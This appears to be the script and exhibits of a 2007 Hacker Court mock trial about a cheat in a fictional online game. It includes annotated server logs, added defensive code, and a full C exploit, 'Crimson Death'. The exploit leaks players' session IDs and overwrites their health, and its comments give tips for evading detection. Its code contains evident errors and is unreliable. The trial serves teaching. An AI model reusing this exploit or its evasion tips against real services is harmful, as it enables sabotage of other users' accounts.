Hacker Court 2007 [email protected]


CAST

JUDGE: Richard Salgado – Attorney, Former Senior Counsel of CCIPS division of DoJ

COURT CLERK: Caitlin Klein

EMCEE: Carole Fennelly, Senior Security Engineer, Tenable Network Security

PROSECUTOR: Jennifer Granick, Director, Center for Internet and the Law, Stanford University

DEFENSE ATTORNEY: Kevin Bankston – Attorney, Electronic Frontier Foundation

CASE AGENT (TSA – AGENT SMITH): Brian Martin – Attrition

PROSECUTION EXPERT: Jesse Kornblum – Former Captain, USAFOSI

GETTA INDUSTRIES CEO, MICHAEL BAGGINS: Richard Thieme – President, Thiemeworks

GETTA INDUSTRIES IT DIRECTOR, FREDO BAGGINS: Jonathan Klein – Regional Security Director - North, Calence, LLC

DEFENDANT (DAVID NELSON): Ryan Bulat - Intern, Wizard’s Keys Corp.

DEFENSE EXPERT (Jeffrey Liebowski): Simple Nomad - NMRC

Schedule

18:30 – Introductions, Court Called to Order

18:35 – 19:05 Opening Statements

19:05 – 19:20 Michael Baggins

19:20 – 19:35 Fredo Baggins

19:35 – 19:50 Agent Smith

19:50 – 20:05 Jesse Kornblum

20:05 – 20:15 break

20:15 – 20:30 Jeffrey Liebowski

20:30 – 20:45 Closing Statements

20:45 – 21:15 panel discussion

Witness classification

Factual: testifies to events directly witnessed or observed. May only testify regarding facts, not draw conclusions.

Expert: specifically qualified by the court as an expert in the subject at hand. May offer opinion and draw conclusions based on knowledge and expertise.

Prosecution Opening Statement

Enter Key Points Here

Defense Opening Statement

Enter Key Points Here

Prosecution Witness 1

Michael Baggins is the President of Getta Industries testifying as a factual witness on impact to his company based on David Nelson’s Actions.

Prosecution Witness 2

Fredo Baggins is the not so bright younger brother of Michael Baggins. He is the IT Director of Getta Industries testifying as a factual witness on impact to his company based on David Nelson’s Actions.

Defense Exhibit 1

Prosecution Witness 3

Agent Smith is the TSA Case Agent. He is testifying as a factual and expert witness on the search of David Nelson’s personal effects.

Stipulations

Factual: an agreement between prosecution and defense on particular facts, eliminating the need for testimony.

Testimonial: an agreement between prosecution and defense that a particular witness would testify in the manner stipulated, if called to the stand.

Government Exhibit 1

DISCLAIMER: The following document is a fictionalized testimonial stipulation for the Black Hat 2003 Conference. The witness of the stipulation does not exist, nor was any evidence in this matter gathered.

__________________________________ x

UNITED STATES OF AMERICA,

-v.-

David Nelson,

Defendant.

STIPULATION

__________________________________

IT IS HEREBY STIPULATED AND AGREED between the United States of America, Jennifer Granick, Assistant United States Attorney, of counsel, and the defendant DAVID NELSON, by his attorney Kevin Bankston, Esq.:

If called as a witness, Gob Bluth would testify as follows:

1) He’s the Policy Enforcement officer at Bluth Industries Internet Access division (bluth.com), which is located in Orange County, California.

2) bluth.com provides high speed internet access to the Maryland area. Internet access is provided by Digital Subscriber Line (DSL) and Dialup-Connection.

3) When a subscriber connects to the bluth.com backbone, the subscriber is provided with an Internet Protocol (IP) address that is unique to the subscriber during their session.

4) bluth.com is assigned the Class B address 66.137.0.0 and 63.214.247.170 by the American Registry of Internet Numbers (ARIN) to provide IP addresses for its customers.

Government Exhibit 1-2

4) Mr. Bluth has reviewed the business records maintained by bluth.com for June 15th – July 15th, 2006 and determined that IP address 63.214.247.170 was assigned to the computer owned by Mr. David Nelson, 1445 West End Ave, Burbank, CA

5) Mr. Bluth has reviewed the business records maintained by bluth.com for June 15th – July 15th, 2006 and determined that IP address 66.137.228.186 was assigned to the computer owned by Ms. Betty Nelson, 1420 West End Ave, Burbank, CA

7) Mr. Bluth has reviewed the business records maintained by bluth.com for June 15th – June 15th, 2006 and determined that the above IP addresses were active during those times.

IT IS FURTHER STIPULATED AND AGREED that this stipulation may be received in evidence as a Government exhibit at trial.

Dated: July 1, 2007

By: ____________________________ JENNIFER GRANICK Assistant United States Attorney

By: ___________________________ KEVIN BANKSTON, ESQ. Attorney for David Nelson

Prosecution Exhibit 2

Output of /var/log/mom.log

Jul 27 14:14:33 localhost momd: UserLogonRequest for Talisman from 207.132.116.25

Jul 27 14:14:33 localhost momd: UserLogonSuccessful for Talisman from 207.132.116.25

Jul 27 14:14:33 localhost momd: RequestUserSessionId for Talisman from 207.132.116.25

Jul 27 14:14:33 localhost momd: ReplyUserSessionId for Talisman to 207.132.116.25 (0x9816a7b7)

Jul 27 16:01:16 localhost momd: UserLogonRequest for CrimsonKnight from 66.137.228.186

Jul 27 16:01:16 localhost momd: UserLogonSuccessful for CrimsonKnight from 66.137.228.186

Jul 27 16:01:16 localhost momd: RequestUserSessionId for CrimsonKnight from 66.137.228.186

Jul 27 16:01:17 localhost momd: ReplyUserSessionId for CrimsonKnight to 66.137.228.186 (0xfa453c90)

Jul 27 16:05:59 localhost momd: UserLogonRequest for GalleySlave from 63.214.247.170

Jul 27 16:05:59 localhost momd: UserLogonSuccessful for GalleySlave from 63.214.247.170

Jul 27 16:05:59 localhost momd: RequestUserSessionId for GalleySlave from 63.214.247.170

Jul 27 16:05:59 localhost momd: ReplyUserSessionId for GalleySlave from 63.214.247.170 (0xaf049289)

Jul 27 16:05:59 localhost momd: RequestChatP GalleySlave (0xaf049289) to Talisman - 63.214.247.170

Jul 27 16:05:59 localhost momd: ReplyChatP Talisman (0x9816a7b7) for GalleySlave (0xaf049289) - 63.214.247.170

Jul 27 16:06:00 localhost momd: UpdateScreenName for Talisman from 63.214.247.170 (0x9816a7b7)

Jul 27 16:06:05 localhost momd: UserEvent 0x122 - CrimsonKnight -> Talisman

Jul 27 16:06:06 localhost momd: UserEvent 0x123 - CrimsonKnight -> Talisman

Jul 27 16:06:07 localhost momd: UserEvent 0x128 - CrimsonKnight -> Talisman

Jul 27 16:06:08 localhost momd: UserEvent 0x188 - CrimsonKnight -> Talisman

Jul 27 16:07:38 localhost momd: InventoryUpdate for CrimsonKnight from 66.137.228.186

Jul 27 16:07:38 localhost momd: UserLogoff for CrimsonKnight from 66.137.228.186

Jul 27 16:07:38 localhost momd: UserEvent 0x215 - Talisman

Jul 27 16:09:01 localhost momd: AutoLogoff for GalleySlave from 63.214.247.170

Prosecution Exhibit 3

Output from /var/log/mom.log - annotated

User Talisman logs in:

Jun 27 14:14:33 localhost momd: UserLogonRequest for Talisman from 207.132.116.25

Jun 27 14:14:33 localhost momd: UserLogonSuccessful for Talisman from 207.132.116.25

Jun 27 14:14:33 localhost momd: RequestUserSessionId for Talisman from 207.132.116.25

Jun 27 14:14:33 localhost momd: ReplyUserSessionId for Talisman to 207.132.116.25 (0x9816a7b7)

User CrimsonKnight logs in:

Jun 27 16:01:16 localhost momd: UserLogonRequest for CrimsonKnight from 66.137.228.186

Jun 27 16:01:16 localhost momd: UserLogonSuccessful for CrimsonKnight from 66.137.228.186

Jun 27 16:01:16 localhost momd: RequestUserSessionId for CrimsonKnight from 66.137.228.186

Jun 27 16:01:17 localhost momd: ReplyUserSessionId for CrimsonKnight to 66.137.228.186 (0xfa453c90)

User GalleySlave logs in:

Jun 27 16:05:59 localhost momd: UserLogonRequest for GalleySlave from 63.214.247.170

Jun 27 16:05:59 localhost momd: UserLogonSuccessful for GalleySlave from 63.214.247.170

Jun 27 16:05:59 localhost momd: RequestUserSessionId for GalleySlave from 63.214.247.170

Jun 27 16:05:59 localhost momd: ReplyUserSessionId for GalleySlave from 63.214.247.170 (0xaf049289)

User GalleySlave uses old RequestChatP and gets Talisman's session ID:

Jun 27 16:05:59 localhost momd: RequestChatP GalleySlave (0xaf049289) to Talisman - 63.214.247.170

Jun 27 16:05:59 localhost momd: ReplyChatP Talisman (0x9816a7b7) for GalleySlave (0xaf049289) - 63.214.247.170

User Talisman updates his screenname to Talisman from GalleySlave's IP address

Jun 27 16:06:00 localhost momd: UpdateScreenName for Talisman to Talisman from 63.214.247.170 (0x9816a7b7)

Prosecution Exhibit 3-2

5 seconds later CrimsonKnight challenges Talisman to battle (UserEvent 0x122)

Jun 27 16:06:05 localhost momd: UserEvent 0x122 - CrimsonKnight -> Talisman

1 second later CrimsonKnight uses magic against Talisman (UserEvent 0x123)

Jun 27 16:06:06 localhost momd: UserEvent 0x123 - CrimsonKnight -> Talisman

1 second later CrimsonKnight damages Talisman (UserEvent 0x128)

Jun 27 16:06:07 localhost momd: UserEvent 0x128 - CrimsonKnight -> Talisman

1 second later CrimsonKnight kills Talisman (UserEvent 0x188)

Jun 27 16:06:08 localhost momd: UserEvent 0x188 - CrimsonKnight -> Talisman

A minute and a half later CrimsonKnight updates inventory (more than likely with battle spoils) and logs off

Jun 27 16:07:38 localhost momd: InventoryUpdate for CrimsonKnight from 66.137.228.186

Jun 27 16:07:40 localhost momd: UserLogoff for CrimsonKnight from 66.137.228.186

Talisman resurrects from the dead (UserEvent 0x215)

Jun 27 16:07:56 localhost momd: UserEvent 0x215 - Talisman

After 3 minutes with no activity from GalleySlave, he is logged off

Jun 27 16:09:01 localhost momd: AutoLogoff for GalleySlave from 63.214.247.170
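The correlation the annotated log supports, as an added example that is not part of the exhibit: record the address each session ID was issued to, flag any later entry that presents that ID from a different address, and count requests for the retired RequestChatP command. The line grammar is inferred from the exhibit's log lines, and the function names are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_SESSIONS 64
struct session { unsigned long sid; char user[32]; char ip[16]; };

/* Sample input: lines copied from the annotated exhibit above. */
static const char *SAMPLE[] = {
    "Jun 27 14:14:33 localhost momd: ReplyUserSessionId for Talisman to 207.132.116.25 (0x9816a7b7)",
    "Jun 27 16:01:17 localhost momd: ReplyUserSessionId for CrimsonKnight to 66.137.228.186 (0xfa453c90)",
    "Jun 27 16:05:59 localhost momd: ReplyUserSessionId for GalleySlave from 63.214.247.170 (0xaf049289)",
    "Jun 27 16:05:59 localhost momd: RequestChatP GalleySlave (0xaf049289) to Talisman - 63.214.247.170",
    "Jun 27 16:05:59 localhost momd: ReplyChatP Talisman (0x9816a7b7) for GalleySlave (0xaf049289) - 63.214.247.170",
    "Jun 27 16:06:00 localhost momd: UpdateScreenName for Talisman to Talisman from 63.214.247.170 (0x9816a7b7)",
};
#define SAMPLE_LEN ((int)(sizeof SAMPLE / sizeof SAMPLE[0]))

/* Parse "<event> for <user> ... <ip> (0x<sid>)"; returns 1 if the line has that shape. */
static int parse(const char *line, char *event, struct session *s)
{
    const char *msg = strstr(line, "momd: ");
    const char *paren = strrchr(line, '(');
    const char *start;

    if (!msg || !paren || paren < msg + 6 || paren[-1] != ' ') return 0;
    if (sscanf(msg + 6, "%31s for %31s", event, s->user) != 2) return 0;
    for (start = paren - 1; start > msg && start[-1] != ' '; start--)
        ;                                   /* walk back over the IP token */
    if (paren - 1 == start || paren - 1 - start > 15) return 0;
    memcpy(s->ip, start, (size_t)(paren - 1 - start));
    s->ip[paren - 1 - start] = '\0';
    s->sid = strtoul(paren + 1, NULL, 16);
    return 1;
}

/* Count entries where a session ID is presented from an address other than
 * the one it was issued to in ReplyUserSessionId. */
int count_session_ip_mismatches(const char **lines, int n)
{
    struct session t[MAX_SESSIONS], cur;
    int used = 0, hits = 0, i, j;
    char event[32];

    for (i = 0; i < n; i++) {
        if (!parse(lines[i], event, &cur)) continue;
        if (strcmp(event, "ReplyUserSessionId") == 0) {   /* issuance */
            if (used < MAX_SESSIONS) t[used++] = cur;
            continue;
        }
        for (j = 0; j < used; j++)
            if (t[j].sid == cur.sid && strcmp(t[j].ip, cur.ip) != 0) {
                printf("ALERT %s: session 0x%lx issued to %s at %s, used from %s\n",
                       event, cur.sid, t[j].user, t[j].ip, cur.ip);
                hits++;
            }
    }
    return hits;
}

/* Count requests for the peer-to-peer chat command retired after the first beta. */
int count_chatp_requests(const char **lines, int n)
{
    int hits = 0, i;
    for (i = 0; i < n; i++) hits += strstr(lines[i], "momd: RequestChatP ") != NULL;
    return hits;
}

int main(void)
{
    printf("mismatches=%d\n", count_session_ip_mismatches(SAMPLE, SAMPLE_LEN));
    printf("chatp=%d\n", count_chatp_requests(SAMPLE, SAMPLE_LEN));
    return 0;
}
```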

Prosecution Witness 4

Jesse Kornblum is an independent government contractor assigned to the TSA. He is testifying as a factual and expert witness on his forensic examination of David Nelson’s computer.

Prosecution Exhibit 4-1

/*

* Crimson Death

* Written by Crimson Knight <[email protected]>

*

* Background

* ----------

* Ok, how this works is simple. The golden_fleece exploit allowed you

* to update your health and stay strong during battle, but if you have

* the victim's current session id you can reset his health for him.

* Since the session id is treated like a password, all you need is

* the session id, no stealing of passwords required. During the first

* beta of MoM, the peer-to-peer chat system actually gave you the

* session id, but peer-to-peer chat was eliminated after the first

* beta.

*

* Or so we thought!

*

* The code is still in the server software! All we need to do is send

* the old RequestChatP and the server replies with the victim's session

* id as well as the IP address. Then you simply send in the

* UpdateScreenName request with a modified health value and the victim's

* session id, and the health is updated!

*

* Caveats

* -------

* You can drop anyone's health online, however if no one is near them

* and they are not in battle, any self-healing will kick in and they do

* not die. Plus it is more fun to watch them drop! So get close enough

Prosecution Exhibit 4-2

* for any type of interaction (does not have to be battle), and launch

* the exploit. Since you are close to them, the evaluation routines that

* determine battle and conversation levels for interaction are active

* on the server, and you get an instant reaction.

*

* You cannot damage the health of familiars, monsters, and other NPCs,

* just fellow users.

*

* Damage

* ------

* There are three damage types, temp kill, perm kill, and near kill:

*

* Option 1 - Temp kill. This damage lowers the health of the victim

* to 0, rendering them dead instantly. They can resurrect as normal.

*

* Option 2 - Perm kill. The health is set to 2147483648. While this

* may seem wrong, it passes the checks and is used for comparison as

* a signed integer instead of an unsigned integer, making the value

* -1. During the experience and karma adjustments after the kill, this

* causes values in the user profile to become invalid, and the user

* profile is totally unuseable! Nothing, including inventory can be

* recovered. The user profile can not and will not resurrect!

*

* Option 3 - Near kill. This damage lowers the health to 1, leaving

* them vulnerable to a quick and easy kill. All spoils of war rules

* are in affect.

*

* Prevention

* ----------

* Disable all chat capabilities in your profile before use. We usually

* use Skype to communicate anyway, so this isn't a big deal. If you

* must communicate with other non-clan folk, use a familiar.

*

Prosecution Exhibit 4-3

* Tips

* ----

* 1. Do not run the exploit from your home computer, especially the

* same computer you game from! It can run on a separate computer, so

* use a shell on a different system. The exploit does not require root

* to run. Although Getta seems incompetent when it comes to catching

* cheaters, they may be logging IP addresses.

* 2. Do not use your main user id and password. Use a secondary account,

* ask around the clan as someone always has some extra accounts, and

* any valid account will work.

* 3. If you time the exploit using damage option 3 and a fireball,

* frost, or shock spell, the victim will simply assume your spell is

* massively powerful and not notice their health dropped before the

* spell actually hit them.

* 4. Use damage option 2 sparingly. It will draw needless attention to

* the flaw. Use it only for those assholes most deserving!

*

* -Crim

*/

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <netdb.h>

#include <unistd.h>

#include <signal.h>

Prosecution Exhibit 4-4

/* for reference, this is incomplete but this is all we need...

* it is based upon the golden_fleece exploit which allows overwriting

* the health, stamina, etc of your own character

struct userprofile

{

uint32 userid;

uint32 name_len;

char name[64];

uint32 health;

uint32 stamina;

uint32 experience;

uint32 level;

etc etc...

} up;

*/

#define VERSION "1.0"

#define MAXBUF 512

#define SERVER "66.137.228.188"

#define PORT 17230

/* shorthand */

typedef unsigned char uint8;

typedef unsigned short uint16;

typedef unsigned long uint32;

/* globals */

char buffer_out[MAXBUF];

char buffer_in[MAXBUF];

uint32 my_session_id;

uint32 victim_session_id;

Prosecution Exhibit 4-5

void clean_buf(void)

{

memset(buffer_out,0,MAXBUF);

memset(buffer_in,0,MAXBUF);

}

void caughtsig(int sig)

{

fprintf(stdout,"Operation timed out\n");

exit(sig);

}

void usage(char *prog)

{

fprintf(stderr,"USAGE: ");

fprintf(stderr,"%s -u yourid -p yourpassword -v victimid [opts]\n\n",prog);

fprintf(stderr," opts are k t h\n");

fprintf(stderr," -d type type is 0 for temp kill,\n");

fprintf(stderr," 1 for perm kill, and 2 for\n");

fprintf(stderr," near kill\n");

fprintf(stderr," -t timeout timeout in seconds (default 10)\n");

fprintf(stderr," -h this help screen\n");

fprintf(stderr,"\n");

}

typedef struct RequestUserSessionId

{

uint32 header; // always \xff\xff\xff\xff

uint32 mom1; // always \x4d\x6f\x4d\x31

uint32 command; // always \x04\x01\x00\x00

uint32 userid_len;// length of user id

char userid[64]; // user id

Prosecution Exhibit 4-6

uint32 pass_len; // length of password

char password[64]; // password

uint32 tail; // always \xff\xff\xff\xff

} requestusersessionid;

typedef struct ReplyUserSessionId

{

uint32 header; // always \xff\xff\xff\xff

uint32 mom1; // always \x4d\x6f\x4d\x31

uint32 command; // always \x05\x01\x00\x00

uint32 id; // session id;

} replyusersessionid;

// ChatP protocol left over from beta1, but still supported on

// MoM servers, the P was for peer-to-peer, not supported on

// MoM client side since beta2.

typedef struct RequestChatP

{

uint32 header; // always \xff\xff\xff\xff

uint32 mom1; // always \x4d\x6f\x4d\x31

uint32 command; // always \x01\x0a\x00\x00

uint32 id; // our session id

uint32 chat_len; // length of victim chat name

char name[64]; // victim's chat name

uint32 random; // ???

} requestchatp;

// Note the reply contains the victim's current session ID and

// ip address, what the fuck were they smoking? LOLZ

typedef struct ReplyChatP

{

uint32 header; // always \xff\xff\xff\xff

uint32 mom1; // always \x4d\x6f\x4d\x31

Prosecution Exhibit 4-7

uint32 command; // always \x02\x0a\x00\x00

uint32 id; // victim's session id! wtf!

uint32 ip; // victim's ip address

uint16 udp_port; // victim's chat port

uint16 unknown1;// always \xff\xff

uint32 random; // ???

} replychatp;

typedef struct CrimsonDeath

{

uint32 header; // always \xff\xff\xff\xff

uint32 mom1; // always \x4d\x6f\x4d\x31

uint32 command; // always \x0a\x07\x00\x00

uint32 id; // session id (like the password!)

uint32 name_len; // length of new name, make it 68 to overwrite

// victim's health on the server!

char name[64]; // 64 plus 4 bytes to overwrite health

uint32 health; // 0 means death, 2147483648 means perm death!

// (it corrupts the userprofile, but no loot)

// 1 means they are very very easy to kill and

// you can grab stuff they drop!

} crimdeath;

int send_udp(int size)

{

int s,rc;

struct sockaddr_in serveraddr;

struct hostent *hostp;

char *bufptr = buffer_out;

if((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)

{

perror("send_udp: socket() error");

exit(-1);

Prosecution Exhibit 4-8

}

memset(&serveraddr,0,sizeof(struct sockaddr_in));

serveraddr.sin_family = AF_INET;

serveraddr.sin_port = htons(PORT);

{

hostp = gethostbyname(SERVER);

if(hostp == (struct hostent *)NULL)

{

printf("HOST NOT FOUND --> ");

printf("h_errno = %d\n", h_errno);

exit(-1);

}

memcpy(&serveraddr.sin_addr, hostp->h_addr, sizeof(serveraddr.sin_addr));

}

rc = sendto(s, bufptr, size, 0, (struct sockaddr *)&serveraddr, sizeof(serveraddr));

if(rc < 0)

{

perror("send_udp: sendto() error");

close(s);

exit(-1);

}

return(s);

}

int recv_udp(int s)

{

int rc;

struct sockaddr_in serveraddr;

int serveraddrlen = sizeof(serveraddr);

char *bufptr = buffer_in;

int buflen = sizeof(buffer_in);

memset(&serveraddr,0,sizeof(struct sockaddr_in));

rc = recvfrom(s, bufptr, buflen, 0, (struct sockaddr *)&serveraddr, (socklen_t *)serveraddrlen);

close(s);

return(rc);

}

Prosecution Exhibit 4-9

int get_our_session_id(char *name, char *password)

{

struct RequestUserSessionId *reqsessid;

struct ReplyUserSessionId *repsessid;

int rc;

if((reqsessid = malloc(sizeof(struct RequestUserSessionId))) == NULL)

{

perror("get_our_session_id: malloc() error\n");

exit(-1);

}

memset(&reqsessid,0,sizeof(struct RequestUserSessionId));

if((repsessid = malloc(sizeof(struct ReplyUserSessionId))) == NULL)

{

perror("get_our_session_id: malloc() error\n");

exit(-1);

}

memset(&repsessid,0,sizeof(struct ReplyUserSessionId));

reqsessid->header = 0xffffffff;

reqsessid->mom1 = 0x314d6f4d;

reqsessid->command = 0x104;

reqsessid->userid_len = strlen(name);

memcpy(&reqsessid->userid,name,strlen(name));

reqsessid->pass_len = strlen(password);

memcpy(&reqsessid->password,password,strlen(password));

reqsessid->tail = 0xffffffff;

clean_buf();

memcpy(&buffer_out,reqsessid,sizeof(reqsessid));

rc = recv_udp(send_udp(sizeof(reqsessid)));

memcpy(&repsessid,buffer_in,sizeof(repsessid));

Prosecution Exhibit 4-10

if(repsessid->command == 0x105)

{

my_session_id = repsessid->id;

rc = 1;

}

else

{

rc = -1;

}

free(reqsessid);

free(repsessid);

return(rc);

}

int get_victim_session_id(char *victim)

{

struct RequestChatP *reqchatp;

struct ReplyChatP *repchatp;

int rc;

if((reqchatp = malloc(sizeof(struct RequestChatP))) == NULL)

{

perror("get_victim_session_id: malloc() error\n");

exit(-1);

}

memset(&reqchatp,0,sizeof(struct RequestChatP));

if((repchatp = malloc(sizeof(struct ReplyChatP))) == NULL)

{

perror("get_victim_session_id: malloc() error\n");

exit(-1);

}

memset(&repchatp,0,sizeof(struct ReplyChatP));

Prosecution Exhibit 4-11

reqchatp->header = 0xffffffff;

reqchatp->mom1 = 0x314d6f4d;

reqchatp->command = 0xa01;

reqchatp->id = my_session_id;

reqchatp->chat_len = strlen(victim);

memcpy(&reqchatp->name,victim,strlen(victim));

reqchatp->random = 0xaddeadde;

clean_buf();

memcpy(&buffer_out,reqchatp,sizeof(reqchatp));

rc = recv_udp(send_udp(sizeof(reqchatp)));

memcpy(&repchatp,buffer_in,sizeof(repchatp));

if(repchatp->command == 0x102)

{

victim_session_id = repchatp->id;

rc = 1;

}

else

{

rc = -1;

}

free(reqchatp);

free(repchatp);

return(rc);

}

void crimson_death(char *victim, int damage)

{

struct CrimsonDeath *crimsondeath;

int rc;

Prosecution Exhibit 4-12

if((crimsondeath = malloc(sizeof(struct CrimsonDeath))) == NULL)

{

perror("crimson_death: malloc() error\n");

exit(-1);

}

memset(&crimsondeath,0,sizeof(struct CrimsonDeath));

crimsondeath->header = 0xffffffff;

crimsondeath->mom1 = 0x314d6f4d;

crimsondeath->command = 0x70a;

crimsondeath->id = victim_session_id;

crimsondeath->name_len = 68;

memcpy(&crimsondeath->name,victim,strlen(victim));

switch(damage)

{

case 0:

crimsondeath->health = 0;

break;

case 1:

crimsondeath->health = 0x80000000;

break;

case 2:

crimsondeath->health = 1;

break;

}

clean_buf();

memcpy(&buffer_out,crimsondeath,sizeof(crimsondeath));

rc = send_udp(sizeof(crimsondeath));

free(crimsondeath);

}

// end post arg processing

Prosecution Exhibit 4-13

/*

* main

*/

int main(int argc, char **argv)

{

char *prog;

char *userid;

char *password;

char *victim;

char ch;

int damage,rc,timeout = 10,u=0,v=0,p=0;

prog = argv[0];

fprintf(stdout,"Crimson Death v%s\n",VERSION);

fprintf(stdout,"Written by Crimson Knight <[email protected]>\n\n");

while ((ch = getopt(argc, argv, "u:p:v:k:h?t:")) != EOF)

switch(ch)

{

case 'k':

damage = (int)strtol(optarg,NULL,10);

if((damage < 0) || (damage > 2))

{

fprintf(stdout,"Error: invalid damage type\n");

usage(prog);

exit(-1);

}

break;

Prosecution Exhibit 4-14

case 'u':

userid = optarg;

u++;

break;

case 'p':

password = optarg;

p++;

break;

case 'v':

victim = optarg;

v++;

break;

case 't':

timeout = (int)strtol(optarg,NULL,10);

if(timeout<10) timeout = 10;

if(timeout>100)

{

fprintf(stdout,"Error: timeout value too high\n");

usage(prog);

exit(-1);

}

break;

case 'h':

case '?':

usage(prog);

exit(0);

default:

fprintf(stdout,"Error: unknown option\n");

usage(prog);

exit(-1);

}

Prosecution Exhibit 4-15

// post arg processing

if(!u)

{

fprintf(stdout,"Error: -u option needs a userid\n");

usage(prog);

exit(-1);

}

if(!p)

{

fprintf(stdout,"Error: -p option needs a password\n");

usage(prog);

exit(-1);

}

if(!v)

{

fprintf(stdout,"Error: -v option needs a victim\n");

usage(prog);

exit(-1);

}

if(!damage)

{

fprintf(stdout,"Using default of 0 damage (temp kill)\n");

damage = 0;

}

Prosecution Exhibit 4-16

// time for evil...

signal(SIGALRM, caughtsig);

alarm(timeout);

fprintf(stdout,"[+] Getting our session ID\n");

rc = get_our_session_id(userid,password);

alarm(0);

if(rc == 1)

fprintf(stdout,"[+] Done!\n");

else

{

fprintf(stdout,"[-] Failed!\n");

exit(-1);

}

alarm(timeout);

fprintf(stdout,"[+] Getting %s session ID\n",victim);

rc = get_victim_session_id(victim);

alarm(0);

if(rc == 1)

fprintf(stdout,"[+] Done!\n");

else

{

fprintf(stdout,"[-] Failed! Is %s the correct name?\n",victim);

exit(-1);

}

fprintf(stdout,"[+] Deal out some damage....\n");

crimson_death(victim,damage);

fprintf(stdout,"[+] See if %s is still standing!\n",victim);

exit(1);

}
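The server-side conditions the exhibit's comments rely on (a client-supplied name_len of 68 copied into a 64-byte name field that sits directly before health, a session ID honoured from any address, and a health value compared as signed), sketched beside a validating handler. This is an added example, not code from the exhibit or from any real server; the record layout, function names, MAX_HEALTH and status codes are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_LEN   64
#define MAX_HEALTH 1000u        /* assumed game limit, not from the exhibit */
#define ISSUED_IP  0xCF847419u  /* 207.132.116.25 */
#define OTHER_IP   0x3FD6F7AAu  /* 63.214.247.170 */

/* Hypothetical server-side record: name[64] followed directly by a 4-byte
 * health value, the layout the exhibit's userprofile comment describes. */
struct profile {
    uint32_t session_id;
    uint32_t session_ip;              /* address the session ID was issued to */
    unsigned char rec[NAME_LEN + 4];  /* name bytes, then health */
};

int last_status;                      /* status of the most recent demo call */

/* BEFORE: any holder of the session ID is accepted and the client's
 * name_len is trusted, so a length of 68 also rewrites health. */
int update_name_unchecked(struct profile *p, uint32_t sid,
                          const unsigned char *name, uint32_t name_len)
{
    if (sid != p->session_id)
        return -1;
    memcpy(p->rec, name, name_len);
    return 0;
}

/* AFTER: the session must come from the address it was issued to, and
 * name_len must fit both the field and the bytes actually received. */
int update_name_checked(struct profile *p, uint32_t sid, uint32_t src_ip,
                        const unsigned char *name, uint32_t name_len,
                        size_t received)
{
    if (sid != p->session_id || src_ip != p->session_ip)
        return -1;
    if (name_len == 0 || name_len > NAME_LEN || name_len > received)
        return -2;
    memset(p->rec, 0, NAME_LEN);
    memcpy(p->rec, name, name_len);
    return 0;
}

/* BEFORE: signed comparison, so 2147483648 reads as negative and passes. */
int health_ok_signed(uint32_t h)   { return (int32_t)h <= (int32_t)MAX_HEALTH; }
/* AFTER: unsigned range check rejects it. */
int health_ok_unsigned(uint32_t h) { return h <= MAX_HEALTH; }

/* Run one handler against a constructed 68-byte update and return the
 * profile's health afterwards (it starts at 100); checked != 0 picks AFTER. */
uint32_t health_after_update(int checked, uint32_t src_ip, uint32_t name_len)
{
    struct profile p = { 0x9816a7b7u, ISSUED_IP, {0} };
    unsigned char msg[NAME_LEN + 4] = "Talisman";
    uint32_t health = 100, forged = 1;

    memcpy(p.rec + NAME_LEN, &health, sizeof health);
    memcpy(msg + NAME_LEN, &forged, sizeof forged);  /* bytes 65..68 of the update */
    last_status = checked
        ? update_name_checked(&p, p.session_id, src_ip, msg, name_len, sizeof msg)
        : update_name_unchecked(&p, p.session_id, msg, name_len);
    memcpy(&health, p.rec + NAME_LEN, sizeof health);
    return health;
}

int main(void)
{
    printf("unchecked, len 68: health=%u\n", (unsigned)health_after_update(0, OTHER_IP, 68));
    printf("checked,   len 68: health=%u\n", (unsigned)health_after_update(1, ISSUED_IP, 68));
    return 0;
}
```

Binding a session to its issuing address only narrows who can replay it; the exhibit's own comments point at the root cause, which is the leftover RequestChatP handler returning another user's session ID at all.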

Defense Exhibit 2

Place holder for Jesse Photo (You didn’t think I would just put it in here)

Prosecution Exhibit 5

Itemized Damages to Getta Industries

login 33003/tcp

Defense Witness 1

Jeffrey Liebowski is testifying as an expert in general computer knowledge. He is giving expert witness testimony to refute the government’s experts. He is also an avid bowler.

Prosecution Exhibit 6

Picture of Liebowski

Defense Witness 2

David Nelson is the defendant and is not required to take the stand, but has the right to do so if he chooses. His attorney should discourage him from doing so, since the judge can add extra points to his sentence for perjury and obstruction of justice, if he is found guilty.

Prosecution Closing Statements

Prosecution Exhibit 6

Picture of "The Dude"

Defense Closing Statements

Panel Discussion